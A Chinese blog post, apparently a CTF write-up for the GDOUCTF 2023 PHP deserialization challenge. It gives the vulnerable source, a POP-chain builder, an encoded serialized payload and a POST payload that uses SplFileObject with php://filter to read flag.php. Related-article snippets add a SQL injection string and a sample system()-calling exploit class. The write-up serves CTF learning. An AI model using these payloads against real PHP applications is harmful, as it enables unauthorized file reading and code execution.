[GDOUCTF 2023]反方向的钟

最新推荐文章于 2024-08-19 21:44:56 发布
最新推荐文章于 2024-08-19 21:44:56 发布
阅读量1k 收藏 2
点赞数 2
分类专栏: web ctf 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_73767109/article/details/131034853
版权
文章详细解析了一段PHP代码,指出其存在的安全漏洞。代码中,`__wakeup`方法调用`IPO`函数,而`IPO`函数在特定条件下执行`new$_POST[a]($_POST[b])`,允许通过`SplFileObject`类进行文件读取。通过构造序列化的对象并利用`classroom`和`teacher`类的属性,可以触发`hahaha`方法返回真,从而执行`IPO`。最终,作者给出了构造POST数据以读取`flag.php`文件的payload示例。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

<?php
error_reporting(0);
highlight_file(__FILE__);
// flag.php
class teacher{
    public $name;
    public $rank;
    private $salary;
    public function __construct($name,$rank,$salary = 10000){
        $this->name = $name;
        $this->rank = $rank;
        $this->salary = $salary;
    }
}

class classroom{
    public $name;
    public $leader;
    public function __construct($name,$leader){
        $this->name = $name;
        $this->leader = $leader;
    }
    public function hahaha(){
        if($this->name != 'one class' or $this->leader->name != 'ing' or $this->leader->rank !='department'){
            return False;
        }
        else{
            return True;
        }
    }
}

class school{
    public $department;
    public $headmaster;
    public function __construct($department,$ceo){
        $this->department = $department;
        $this->headmaster = $ceo;
    }
    public function IPO(){
        if($this->headmaster == 'ong'){
            echo "Pretty Good ! Ctfer!\n";
            echo new $_POST['a']($_POST['b']);
        }
    }
    public function __wakeup(){
        if($this->department->hahaha()) {
            $this->IPO();
        }
    }
}

if(isset($_GET['d'])){
    unserialize(base64_decode($_GET['d']));
}
?>

先观察代码中可以实现命令执行的地方

可以看到只有

echo new $_POST['a']($_POST['b']);

能利用原生类SplFileObject读取文件

 所以目标点加上school类中的IPO方法

IPO需要在wakeup中调用,而

if($this->department->hahaha()) {
            $this->IPO();
        }

返回为真的时候调用,这样又要看到dapartment调用hahaha

hahaha是classroom的一个方法,所以这里要实例化classroom赋给dapartment

public function hahaha(){
        if($this->name != 'one class' or $this->leader->name != 'ing' or $this->leader->rank !='department'){
            return False;
        }
        else{
            return True;
        }
    }

hahaha返回true三个变量相等其中后面两个变量明显是一个对象中的name和rank变量

有这两个变量的只有teacher类,所以要实例化该类并赋值给leader

最后就是在teacher类中赋值name和rank即可

大致的链子为:

school::__wakeup()–>classroom::hahaha()–>school::IPO() 

 构造pop:

<?php
error_reporting(0);
class teacher{
    public $name;
    public $rank;
    private $salary;
    public function __construct($name,$rank,$salary = 10000){
        $this->name = $name;
        $this->rank = $rank;
        $this->salary = $salary;
    }
}

class classroom{
    public $name;
    public $leader;
    public function __construct($name,$leader){
        $this->name = $name;
        $this->leader = $leader;
    }
    public function hahaha(){
        if($this->name != 'one class' or $this->leader->name != 'ing' or $this->leader->rank !='department'){
            return False;
        }
        else{
            return True;
        }
    }
}

class school{
    public $department;
    public $headmaster;
    public function __construct($department,$ceo){
        $this->department = $department;
        $this->headmaster = $ceo;
    }
    public function IPO(){
        if($this->headmaster == 'ong'){
            echo "Pretty Good ! Ctfer!\n";
            echo new $_POST['a']($_POST['b']);
        }
    }
    public function __wakeup(){
        if($this->department->hahaha()) {
            $this->IPO();
        }
    }
}

$a=new school(new classroom("one class",new teacher("ing","department")),"ong");

echo urlencode(base64_encode(serialize($a)));
?>

得到get参数的payload为:

d=Tzo2OiJzY2hvb2wiOjI6e3M6MTA6ImRlcGFydG1lbnQiO086OToiY2xhc3Nyb29tIjoyOntzOjQ6Im5hbWUiO3M6OToib25lIGNsYXNzIjtzOjY6ImxlYWRlciI7Tzo3OiJ0ZWFjaGVyIjozOntzOjQ6Im5hbWUiO3M6MzoiaW5nIjtzOjQ6InJhbmsiO3M6MTA6ImRlcGFydG1lbnQiO3M6MTU6IgB0ZWFjaGVyAHNhbGFyeSI7aToxMDAwMDt9fXM6MTA6ImhlYWRtYXN0ZXIiO3M6Mzoib25nIjt9

 之后利用原生类SplFileObject读取文件

a为类,b用php协议读取flag.php   /代码中说了flag在flag.php中

所以POST的payload为:

a=SplFileObject&b=php://filter/read=convert.base64-encode/resource=flag.php

 

参考:

(1条消息) GDOUCTF web部分题解 2023_J_a_y_1_7的博客-CSDN博客

[GDOUCTF 2023]Check_Your_Luck
2301_79234037的博客
03-14 444
我因为刚学,啥都不会,所以直接把他转成了txt文本,看里面内容。python代码运行结果。官方下载打开文件解压后是一个cpp文件。
NSSCTF逆向刷题记录
fivesheeptree的博客
07-18 2368
得到第一位字符"N"以及flag的长度为35arr数组的长度只有34,故将i的范围改为34s = ['N']
【无标题】
2301_79880442的博客
04-25 1009
进行代码审计包含flag.php文件,有三个类:pkshow,echo_name这个函数acp,cinder这个保护属性,neutron,nova这两个公有属性;construct,tostring这两个魔术方法。ace,filename,openstack,docker这三个公有属性;echo_name这个函数。一个if语句。第一步找危险函数,找到ace下的echo_name函数,里面有当filename='flag.php'时就会输出flag,但它要通过前面的这个强比较,
反方向
俐郴的专栏
07-23 1277
 呵。。。一路走好?很多人都这样相互祝福着,可怎样走,才算是一路走好??暑假的日子里,校园和社会的衔接日子里,确有力不从心的感觉,怎样才叫保持自我,不被社会同化?很多事情确实应接不暇,很难应付,青春的面庞还是留有稚嫩的痕迹。。。。以前的我为自己与这社会格格不入而庆幸,因为我就是我,无所谓个性,无所谓清高,我做我喜欢的,收获我该得到的。。。。而今,却为自己与社会的点点不融而狼狈,是对是错,学生气
(反序列化)[GDOUCTF 2023]反方向
weixin_73668856的博客
12-08 607
新的:原生类
[极客大挑战 2019]EasySQL,[GDOUCTF 2023]反方向,Buu二维码
2301_81866263的博客
07-31 1735
所以在SELECT*FROM table_name WHERE username='1‘ or 1=1%23'and password='';用另一个’闭合后然后用%23给后面的注释掉执行 or 1=1 这一个恒对的,flag就出来了。‘1’’ 这样的话就会在sql语句中产生报错因为多出来了一个单引号。‘1“’这个是有单引号包含的话双引号就被当成字符串执行了。那么就可以比较确定这个是 ‘ ’ 包含的字符型注入了。get传输,这题是一个注入,判断一下是什么类型的。想试一下注入点的,结果直接就出了。
[GDOUCTF 2023]
rev1ve的博客
05-17 1525
再找到hahaha()所在的类为classroom,要使返回为真,三个变量赋值得为对应的值,leader指向name和rank的值,也就说明$leader=new teacher(),发现name和rank是在teacher类那里,file_get_contents()可以用php://input和data://伪协议。要执行IPO(),看到__wakeup()下,要先执行hahaha()题目是贪吃蛇游戏,F12发现被禁了,右键检查查看js代码。打开题目,f12查看网页源码发现提示/src泄露。
第二届祥云杯 Web 题解1
08-03
- 当用户可以控制的数据被反序列化时,如果这个数据包含恶意构造的对象,则可能会导致任意代码执行。 - 攻击者可以通过构造特殊格式的数据包,使 PHP 解析器执行攻击者提供的代码。 **防范措施**: - 对输入数据...
2023羊城杯 DASCTF EZ-Misc
09-03
2023羊城杯 DASCTF EZ-Misc
HTML网页-反方向
lt265的博客
03-14 197
HTML页面播放反方向
GDOUCTF web部分题解 2023
Jay17的博客
04-16 2283
GDOUCTF web部分题解 2023 (已加上NSS另外两题)
ESP32使用有源蜂鸣器演奏《反方向
qq_22230823的博客
11-06 3684
【代码】ESP32使用有源蜂鸣器演奏《反方向
Web】PHP反序列化刷题记录
uuzeray的博客
11-27 567
再巩固下基础。
[GDOUCTF 2023]Tea
2301_80959088的博客
08-19 270
看形式知道是tea,仔细分析一下密钥的处理有变化,是xtea,与标准的xtea形式也不同,多了一个异或。注意三个地方,解密时循环逆过来,33和(i+j),仔细看加密代码即可理解。最近的题目都不用动态,静态分析就可以了,如图注释。注意这里key有改变,和主函数不同了。
NSSCTF web题记录
热门推荐
m0_64815693的博客
11-08 1万+
[GXYCTF 2019]BabyUpload [GKCTF 2020]CheckIN [NISACTF 2022]babyserialize [NISACTF 2022]popchains [NSSRound#4 SWPU]1zweb prize_p1 prize_p5 [NISACTF 2022]middlerce [SWPUCTF 2021 新生赛]babyunser [TQLCTF 2022]simple_bypass
web方面题目细碎知识点(持续更新)
2301_80307383的博客
08-17 1446
其次$_SERVER['REQUEST_URL']并不会对参数中的特殊符号进行解密 所以$_SERVER['REQUEST_URL']可以用url编码绕过(也可以加号(+) 左中括号([) 空格( ) 点号(.)绕过'_')遇到$a('',$b)类似结构时,传入a=create_function和b=}system('tac /flag');$_SERVER['PHP_SELF']得到:/php/index.php/test/tt。其中,字符串a中表示函数需要传入的参数,字符串b表示函数中的执行语句。
GDCTF2023 web wp
m0_63441547的博客
04-16 552
显然考察的是ssti的知识,过滤了很多东西我就不一个个试了,这道题目跟ctfshow里面的ssti369很类似,大家可以去看看,我推荐这篇文章。修改得分处score,因为是除号,所以要把值1000改得小一点,这样我们得到的分数就会很大。(2).cookie传参,可以下载一些插件,比如cookie-editor。数组,在加密数组的时候会返回NULL,所以我们可以post传入两个数组。小白作者的第一篇博客,不会写,各位佬轻喷(😂~~~),写的很详细很清楚,我在这就不罗嗦了直接打。(1). 由于md5不能。
ctf反序列化题目难
最新发布
01-17
### CTF 反序列化题目解题思路和技巧 #### 理解PHP反序列化机制 在处理CTF中的PHP反序列化题目时,理解`serialize()`和`unserialize()`函数的工作原理至关重要。当对象被序列化后,其状态会被转换成字符串形式以便于传输或存储;而在反序列化过程中,则会将这些字符串重新构造成原始的对象实例[^2]。 #### 构建恶意payload 构建有效的攻击载荷通常涉及利用特定类的方法来触发预期的行为。例如,在给定的例子中,通过构造特殊的输入参数并传递给`$_GET`超全局数组成员变量,可以控制程序流从而实现远程命令执行或其他有害操作[^3]。 #### 利用魔术方法 某些情况下,可以通过操控含有特殊名称(即所谓的“魔法”)的方法来进行攻击。比如`__wakeup()`会在调用`unserialize()`之后立即被执行,这使得它成为一个潜在的安全风险点——特别是当该方法内部包含了危险的操作如`eval()`时[^5]。 #### 绕过安全检测逻辑 有时挑战者可能会设置一些简单的防护措施试图阻止非法的数据提交。了解如何巧妙地绕开这类检查也是成功解决问题的关键之一。例如,针对条件语句`if (strstr($_GET["c"], "popko") === false)`,可以选择适当调整发送的内容使其不包含敏感关键字以规避过滤[^4]。 ```php // 示例:创建一个带有恶意代码的可序列化对象 class Exploit { public $cmd; function __construct($command){ $this->cmd=$command; } function __destruct(){ system($this->cmd); } } $malicious_obj = new Exploit('id'); serialized_data=serialize($malicious_obj); // 发送经过编码后的数据至目标服务器 ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sharpery

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值